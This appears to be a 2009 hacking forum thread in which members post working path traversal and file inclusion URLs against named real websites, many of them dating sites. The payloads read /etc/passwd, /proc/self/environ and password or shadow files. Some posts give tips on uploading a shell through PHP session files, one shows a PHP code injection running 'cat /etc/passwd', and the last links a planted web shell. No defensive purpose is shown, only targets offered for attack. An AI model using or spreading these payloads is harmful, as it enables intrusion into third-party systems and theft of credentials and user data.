09.10.2009, 13:27
http://www.angel-bal.ru/?flash=0&pg=text.php&path=../../../../../../../../../../../etc/passwd

0nep@t0p
11.10.2009, 00:45
http://www.menopausethemusical.com/main.php?page=../../../../../../../proc/self/fd/2%00&getshow=210

hackmon
11.10.2009, 23:05
http://rgsu.by/index.php?cat=../../../../boot.ini%00/*

nikp
12.10.2009, 00:22
http://www.dateautismsingles.com/member/sign_in.php?language_id=../../../../../../etc/passwd%00

http://realasianlove.com/faq.php?language_id=../../../../../../../../etc/passwd%00
http://realasianlove.com/faq.php?language_id=../../../../../../../../proc/self/environ%00
http://realasianlove.com/faq.php?language_id=../../../../../../../../proc/self/fd/2%00

http://rsvpsinglelife.com/member/links_directory.php?language_id=../../../../../../etc/passwd%00
http://rsvpsinglelife.com/phpinfo.php

nikp
13.10.2009, 01:16
http://www.mingleifsingle.com/about.php?language_id=../../../../../../etc/passwd%00
http://www.mingleifsingle.com/about.php?language_id=../../../../../..//home/mingleif/etc/mingleifsingle.com/shadow%00

http://www.futbolcontactos.com/forum/forum.php?language_id=../../../../../../etc/passwd%00

[x60]unu
13.10.2009, 01:37
http://lesnoyexpert.spb.ru/index.php?p=about&id=../../../../etc/passwd%00
http://lesnoyexpert.spb.ru/index.php?p=about&id=../../../../proc/self/fd/2%00

Phen1x
13.10.2009, 14:14
http://umadevi-artgallery.com/?file=/home/umadevia/public_html/_vti_pvt/service.pwd&flashContent=c2

nikp
14.10.2009, 01:11
http://www.zenith-france.com/dating/privacy.php?language_id=../../../../../../../../../etc/passwd%00
http://www.zenith-france.com/dating/privacy.php?language_id=../../../../../../../../../proc/self/fd/2%00

It runs an engine made by "SkaDate social networking software"
It's convenient to upload a shell via the session: look at the cookies, find the session
http://www.zenith-france.com/dating/privacy.php?language_id=../../../../../../../../../tmp/sess_ee1f74898b80f31c2848a56c24b0048a%00

same story
http://www.swingland.dk/member/join.php?language_id=../../../../../../../../etc/passwd%00

on the aston.skadate.com hosting
http://www.citasrapidas.com.mx/member/join.php?language_id=../../../../../../etc/passwd%00
http://www.cosmicties.com/member/featured_list.php?language_id=../../../../../../etc/passwd%00
http://www.duhlan.com/top_rated_photos.php?language_id=../../../../../../etc/passwd%00
http://www.exoticity.net/member/media_view.php?language_id=../../../../../../etc/passwd%00
http://www.myflingdate.com/member/featured_list.php?language_id=../../../../../../etc/passwd%00
http://www.rightmate.net/forum/topic.php?topic_id=6&language_id=../../../../../../etc/passwd%00
http://www.sawasdeeka.com.au/faq.php?language_id=../../../../../../etc/passwd%00
http://www.swinging4pleasure.com/contact.php?language_id=../../../../../../etc/passwd%00

nemaniak
16.10.2009, 20:26
sosolid2k.co.uk

http://www.sosolid2k.co.uk/site.php?page=../../../../../../../../etc/passwd

and also

http://www.sosolid2k.co.uk/guides/monsters/monster-guide.php?
monster=../../../../../../../../etc/passwd

conservatoryoutlet.co.uk

http://conservatoryoutlet.co.uk/shop.cgi?page=../../../../../../../etc/passwd

SeNaP
19.10.2009, 18:48
http://www.rounder.com/index.php?id=index.php&newsId=973



http://www.mvizru.ru/index.php?id=index.php



http://www.keller.com.ua/index.php?id=index.php

http://www.electrolatrine.net/uk/index.php?page=index.php
http://www.roleplay2.com/index.php?page=index.php

http://blangkonet.co.cc/index.php?page=index.php

http://voice-sms.net/index.php?page=index.php

Ctacok
20.10.2009, 18:40
http://www.je.au.com/common/file.php?file=../../../../../../../../etc/passwd

Sort of a downloader.


nikp
20.10.2009, 21:30
http://www.anat.stonybrook.edu/IDPAS/index.php?page=../../../../../../../../etc/passwd%00

http://www.speakmania.com/index.php?language_id=../../../../../../../../etc/passwd%00

Ctacok
21.10.2009, 07:42
http://www.kristinalucas.com/img.php?id=2/../../index.html%00&pf=1

http://www.prezident.md/const.php?lang=anti - whoever can work this one out gets +5.

Gray_Wolf
22.10.2009, 10:49
http://www.sarznak.ru/forum/forumdisplay.php?fid=2&sortby=%27];system%28%27cat%20/etc/passwd%27%29;exit;//

nikp
22.10.2009, 20:52
http://hiphopgame.ihiphop.com/index2.php3?page=../../../../../../../../etc/passwd%00

http://www.warnerfamilychiropractic.com/index.php?file=../../../../../../../../../etc/passwd%00

Ctacok
23.10.2009, 18:49
http://www.heitmannplus.no/litteratur/index_artikkel.php4?nyhetsoverskrift=Grunnleggende %20antagelser%20for%20et%20nytt%20%E5rhundre&artikkel_id=../../../../../../../../../../../../../etc/passwd

nikp
25.10.2009, 21:04
http://adirondackchiropractic.com/index.php?file=../../../../../../../../etc/passwd%00&documentName=ywtl
doesn't let you in without socks, maybe it doesn't like the country or it detects the proxy

http://www.termassaojoao.com.br/index.php?conteudo=/etc/passwd

Ctacok
25.10.2009, 21:28
http://www.metaltotal.ru/index.php?file=index.php

mailbrush
28.10.2009, 17:35
http://www.bsgpilots.com/Themes/XD-Reborn/index.template.php?cmd=ls
Not quite on topic, but still...
PS: The shell uploads without problems :)